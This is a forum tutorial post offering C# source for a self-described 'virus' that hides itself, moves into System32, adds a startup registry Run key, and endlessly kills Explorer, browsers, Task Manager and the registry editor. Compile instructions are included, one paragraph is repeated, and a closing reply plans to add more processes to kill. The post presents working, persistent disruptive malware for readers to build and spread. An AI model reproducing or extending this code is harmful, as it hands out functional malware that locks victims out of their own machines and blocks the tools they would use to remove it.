[Tutorial] Programming your own FSEK Virus
Well since l0ngcat showed everyone a tutorial on how to make a trainer i thought i would show you how to make a virus. It took me 30 minutes and is programmed in C# (Newer and easier version of C++).
A basic explanation of what it does is that it copies itself to the system32 folder and creates a registry key so it runs on startup but the main function is to close explorer, internet explorer, firefox, task manager and the registry editor processes. It is not distructive in any way (it doesnt delete explorer or anything, it only closes the process).
How to compile? Simply download C# (express edition is free) and insert this code into the main form load function and compile (Not Run!!).
Feel free to change it but keep the name.
How to remove? Start windows in safe mode (F8 on while booting) and simply delete fsekv.exe from C:\Windows\System32 and delete the key from the registry (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run).
A basic explanation of what it does is that it copies itself to the system32 folder and creates a registry key so it runs on startup but the main function is to close explorer, internet explorer, firefox, task manager and the registry editor processes. It is not distructive in any way (it doesnt delete explorer or anything, it only closes the process).
How to compile? Simply download C# (express edition is free) and insert this code into the main form load function and compile (Not Run!!).
Feel free to change it but keep the name.
Code:
//Fluffy Simple Explorer Killer Virus - Version 1.0.0
private void Form1_Load(object sender, EventArgs e)
{
this.Visible = false; //Make the window invisible
this.ShowInTaskbar = false;
if (Application.StartupPath != Environment.GetFolderPath(Environment.SpecialFolder.System)) //If this file isnt in the system32 directory....
{
try
{
FileInfo me = new FileInfo(Application.ExecutablePath); //This file
me.MoveTo(Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\fsekv.exe"); //...then move this file to C:\Windows\System32\fsekv.exe (Default path)
RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true); //Registry info
key.SetValue("fsekv", "\"" + Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\fsekv.exe\""); //Create the registry key making the virus run on startup
}
catch { }
}
while (true)
{
try
{
Process[] pros = Process.GetProcesses(); //Get info of all processes
foreach (Process pro in pros)
{
if (pro.ProcessName == "explorer" || pro.ProcessName == "regedit" || pro.ProcessName == "iexplore" || pro.ProcessName == "firefox" || pro.ProcessName == "taskmgr") //If the inspected process has one of these names...
{
pro.Kill(); //...then kill it
}
}
Thread.Sleep(10);
}
catch { }
}
}
. Still ill have good fun i can edit this and add more process to kill cant I? I think i'm the only one who is impressed lol.